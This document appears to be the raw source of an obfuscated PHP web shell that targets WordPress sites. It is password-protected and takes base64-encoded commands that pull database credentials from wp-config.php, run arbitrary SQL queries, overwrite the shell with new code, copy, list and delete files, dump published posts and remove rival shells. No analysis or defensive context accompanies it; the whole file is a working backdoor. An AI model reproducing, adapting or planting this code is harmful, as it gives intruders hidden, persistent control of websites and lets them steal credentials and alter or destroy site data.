sp5c1f17

1. xjA595CIQ
2. <?php
3. define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '76c8ed7a7925b8bce85919bb3e72b6c2'); define('VERSION', '0.2.3'); function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } } function r_get_config_path() { $sp5c1f17 = realpath('.'); $spf537af = 0; while ($sp5c1f17 != '/') { if (file_exists(sprintf('%s/wp-config.php', $sp5c1f17)) && file_exists(sprintf('%s/index.php', $sp5c1f17)) && file_exists(sprintf('%s/wp-settings.php', $sp5c1f17))) { return $sp5c1f17; } $spf537af++; $sp5c1f17 = realpath(str_repeat('../', $spf537af)); } } function r_get_config() { $sp5c1f17 = realpath('.'); $spf537af = 0; while ($sp5c1f17 != '/') { file_put_contents('flog.log', $sp5c1f17 . '
4. ', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $sp5c1f17)) && file_exists(sprintf('%s/index.php', $sp5c1f17)) && file_exists(sprintf('%s/wp-settings.php', $sp5c1f17))) { $sp8ec807 = file(sprintf('%s/wp-config.php', $sp5c1f17)); $sp8ec807 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $sp8ec807), PREG_GREP_INVERT); $sp8ec807 = implode('
5. ', $sp8ec807); eval($sp8ec807); $sp600ca0 = 'table_prefix'; $spd8b3be = explode(':', DB_HOST); $spc6c951 = array_shift($spd8b3be); $spffd1e3 = array_shift($spd8b3be); $spffd1e3 = $spffd1e3 ? $spffd1e3 : 3306; return array('host' => $spc6c951, 'port' => $spffd1e3, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$sp600ca0}, 'path' => $sp5c1f17); break; } $spf537af++; $sp5c1f17 = realpath(str_repeat('../', $spf537af)); } } function r_mysql_connect($sp8ec807) { $sp23919b = mysql_connect(sprintf('%s:%s', $sp8ec807['host'], $sp8ec807['port']), $sp8ec807['user'], $sp8ec807['pass']); mysql_select_db($sp8ec807['db'], $sp23919b); return $sp23919b; } function r_mysqli_connect($sp8ec807) { return new mysqli($sp8ec807['host'], $sp8ec807['user'], $sp8ec807['pass'], $sp8ec807['db'], is_numeric($sp8ec807['port']) ? $sp8ec807['port'] : 3306, !is_numeric($sp8ec807['port']) ? $sp8ec807['port'] : null); } function r_mysql_query($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array()) { if (!empty($sp9ba8be)) { foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) { $sp50916d = str_replace($spe4aeb1, mysql_real_escape_string($sp5be917, $sp23919b), $sp50916d); } } $sp321ed1 = array(); $spf5d314 = mysql_query($sp50916d, $sp23919b); if ($spf5d314) { while ($sp595910 = mysql_fetch_assoc($spf5d314)) { $sp321ed1[] = $sp595910; } return array('success' => $sp321ed1); } else { return array('error' => sprintf('%s :: %s', mysql_errno($sp23919b), mysql_error($sp23919b))); } } function r_mysqli_query($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array()) { if (!empty($sp9ba8be)) { foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) { $sp50916d = str_replace($spe4aeb1, $sp23919b->real_escape_string($sp5be917), $sp50916d); } } $spf5d314 = $sp23919b->query($sp50916d); if (is_object($spf5d314)) { $sp321ed1 = array(); while ($sp595910 = $spf5d314->fetch_assoc()) { $sp321ed1[] = $sp595910; } return array('success' => $sp321ed1); } if ($spf5d314) { return array('success' => true); } else { return array('error' => sprintf('%s :: %s', $sp23919b->errno, $sp23919b->error)); } } function r_mysql_query_res($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array()) { if (!empty($sp9ba8be)) { foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) { $sp50916d = str_replace($spe4aeb1, mysql_real_escape_string($sp5be917, $sp23919b), $sp50916d); } } $sp321ed1 = array(); $spf5d314 = mysql_query($sp50916d, $sp23919b); return $spf5d314; } function r_mysql_query_row($spf5d314) { if ($spf5d314) { return mysql_fetch_assoc($spf5d314); } else { return false; } } function r_mysqli_query_res($sp8ec807, $sp23919b, $sp50916d, $sp9ba8be = array()) { if (!empty($sp9ba8be)) { foreach ($sp9ba8be as $spe4aeb1 => $sp5be917) { $sp50916d = str_replace($spe4aeb1, $sp23919b->real_escape_string($sp5be917), $sp50916d); } } $spf5d314 = $sp23919b->query($sp50916d); return $spf5d314; } function r_mysqli_query_row($spf5d314) { if (is_object($spf5d314)) { return $spf5d314->fetch_assoc(); } else { return false; } } function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $spe4aeb1 => $sp5be917) { $_POST[$spe4aeb1] = stripslashes($sp5be917); } } } function r_action_prefix() { $sp8ec807 = r_get_config(); echo $sp8ec807['prefix']; } function r_action_query() { r_unmagic(); $sp8ec807 = r_get_config(); $spa2856c = r_get_lib(); $sp9ba8be = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $sp4e0de7 = array_map('trim', explode(',', $_POST['decode'])); foreach ($sp4e0de7 as $spf99235) { if (isset($sp9ba8be[$spf99235])) { $sp9ba8be[$spf99235] = base64_decode($sp9ba8be[$spf99235]); } } } $sp23919b = call_user_func(sprintf('r_%s_connect', $spa2856c), $sp8ec807); $spf5d314 = call_user_func(sprintf('r_%s_query', $spa2856c), $sp8ec807, $sp23919b, $_POST['query'], $sp9ba8be); if (isset($_POST['encode'])) { $spe614dd = array_map('trim', explode(',', $_POST['encode'])); foreach ($spf5d314['success'] as $sp07f8b4 => $sp595910) { foreach ($spe614dd as $sp51752a) { $spf5d314['success'][$sp07f8b4][$sp51752a] = base64_encode($spf5d314['success'][$sp07f8b4][$sp51752a]); } } } echo json_encode($spf5d314); } function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); } function r_action_version() { echo VERSION; } function r_action_duplicate() { $sp0fa8b0 = copy(__FILE__, $_POST['dst']); echo (int) $sp0fa8b0; } function r_action_copy() { $sp0fa8b0 = copy($_POST['src'], $_POST['dst']); echo (int) $sp0fa8b0; } function r_action_dir() { $sp0fa8b0 = array(); $spf99235 = dir($_POST['dir']); while (false !== ($spddc949 = $spf99235->read())) { $space1b9 = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $spddc949); $sp0fa8b0[] = array('type' => is_file($space1b9) ? 'file' : (is_dir($space1b9) ? 'dir' : 'unknown'), 'entry' => $spddc949, 'full_entry' => $space1b9, 'realpath' => realpath($space1b9)); } $spf99235->close(); echo json_encode($sp0fa8b0); } function r_action_wpversion() { $sp5c1f17 = r_get_config_path(); $spdb7e52 = file_get_contents(sprintf('%s/wp-settings.php', $sp5c1f17)); preg_match_all('/define\\(([^\\)]+)/i', $spdb7e52, $sp2b94d9); foreach ($sp2b94d9[1] as $sp8781b4) { if (strpos($sp8781b4, 'WPINC') !== false) { $sp8781b4 = array_map('trim', explode(',', $sp8781b4)); foreach ($sp8781b4 as $spbbf321 => $sp0f55e2) { if ($sp0f55e2[0] == $sp0f55e2[strlen($sp0f55e2) - 1]) { $sp8781b4[$spbbf321] = substr($sp0f55e2, 1, strlen($sp0f55e2) - 2); } } require_once $sp863dc0 = sprintf('%s%s%s%sversion.php', $sp5c1f17, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $sp8781b4[1]), DIRECTORY_SEPARATOR); $sp520cb8 = 'wp_version'; echo ${$sp520cb8}; die; } } echo 'error'; } function r_action_w3tc() { $sp5c1f17 = r_get_config_path(); $spc0fe89 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spcd3e69 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } $spcd3e69 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } echo 'success'; } function r_action_cenabler() { $sp5c1f17 = r_get_config_path(); $spc0fe89 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } $spcd3e69 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp5c1f17, $spc0fe89); if (file_exists($spcd3e69)) { unlink($spcd3e69); } echo 'success'; } function r_action_removeshell() { if (file_exists($spfccd78 = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($spfccd78 != __FILE__) { unlink($spfccd78); } echo file_exists($spfccd78) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_pages() { $sp580171 = tempnam('./', 'wp') . '.php'; $sp69793a = fopen($sp580171, 'w'); $sp5c1f17 = r_get_config_path(); chdir($sp5c1f17); $sp960dd1 = $_POST['id']; require $sp5c1f17 . '/wp-load.php'; r_unmagic(); $sp8ec807 = r_get_config(); $spa2856c = r_get_lib(); $sp52d344 = $sp8ec807['prefix']; $sp23919b = call_user_func(sprintf('r_%s_connect', $spa2856c), $sp8ec807); $spf5d314 = call_user_func(sprintf('r_%s_query_res', $spa2856c), $sp8ec807, $sp23919b, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $sp52d344, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($sp595910 = call_user_func(sprintf('r_%s_query_row', $spa2856c), $spf5d314)) { fputcsv($sp69793a, array($sp595910['ID'], base64_encode($sp595910['post_content']), base64_encode($sp595910['post_title']), base64_encode(get_permalink($sp595910['ID'])))); } fclose($sp69793a); echo $sp580171; } function r_action_config() { echo json_encode(r_get_config()); } function r_action_getlib() { echo r_get_lib(); } function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; } function r_action_loginurl() { $sp2b6a6c = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $sp450100 = $sp2b6a6c; $sp93cbf8 = basename(__FILE__); $sp580171 = basename(tempnam('./', 'ert') . '.php'); $sp5967fa = preg_replace(sprintf('/%s$/i', preg_quote($sp93cbf8)), $sp580171, $sp450100); echo file_get_contents($sp5967fa); } if (count($_GET) == 1 && !trim($sp862b54 = array_pop(array_values($_GET)))) { $spf5d314 = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $spf5d314); $_GET = $spf5d314; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $sp5c1f17 = r_get_config_path(); chdir($sp5c1f17); $sp960dd1 = $_POST['id']; require_once $sp5c1f17 . '/wp-load.php'; $sp32e67c = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $sp32e67c); break; default: $spb04a86 = sprintf('r_action_%s', $_POST['action']); call_user_func($spb04a86); break; } } else { die('ympf'); }